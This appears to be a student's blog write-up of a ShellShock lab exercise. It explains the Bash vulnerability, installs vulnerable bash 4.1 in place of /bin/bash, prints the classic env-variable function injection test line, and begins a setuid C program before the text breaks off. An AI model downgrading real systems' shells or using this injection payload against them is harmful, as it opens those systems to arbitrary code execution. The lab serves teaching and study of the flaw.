20242811《Linux内核原理与分析》第十二周作业

ShellShock 攻击实验

一、 实验简介

2014年9月24日,Bash中发现了一个严重漏洞shellshock,该漏洞可用于许多系统,并且既可以远程也可以在本地触发。在本实验中,需要亲手重现攻击来理解该漏洞,并回答一些问题。

二、 预备知识

什么是ShellShock?
Shellshock,又称Bashdoor,是在Unix中广泛使用的Bash shell中的一个安全漏洞,首次于2014年9月24日公开。许多互联网守护进程,如网页服务器,使用bash来处理某些命令,从而允许攻击者在易受攻击的Bash版本上执行任意代码。这可使攻击者在未授权的情况下访问计算机系统。——摘自维基百科

三、实验准备

以root权限安装4.1版bash(4.2版本以上的漏洞已经被堵上了) bash4.1 原来的下载地址是 http://ftp/gnu.org/gnu/bash/bash-4.1.tar.gz ,为了加快速度,我们这里使用下面的下载地址 http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
下载

$ sudo su
$ wget http://labfile.oss.aliyuncs.com/bash-4.1.tar.gz
$ tar xf bash-4.1.tar.gz

安装

$ cd bash-4.1
$ ./configure #这一步过程比较长,请等待一会
$ make && make install

下载
安装
链接

$ rm /bin/bash
$ ln -s /usr/local/bin/bash /bin/bash

到这里就安装完了,接下来检测是否存在shellshock漏洞。

$ exit
$ env x='() { :; }; echo vulnerable' bash -c "echo this is a test"

存在shellshock漏洞
输出vulnerable,说明bash有漏洞。
最后,让/bin/sh 指向/bin/bash.

sudo ln -sf /bin/bash /bin/sh

四、实验过程

重现 shellshock 攻击来理解该漏洞
首先,确保安装了带有漏洞的bash版本,并让/bin/sh 指向/bin/bash。

sudo ln -sf /bin/bash /bin/sh

在 /home/shiyanlou 目录下新建一个 shock.c 文件:

vi shock.c
#include <unistd.h>
#include <stdlib.h>
#include <stdio.h>
void main()
{
   
    setuid(geteuid()); // make real uid = effective ui
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值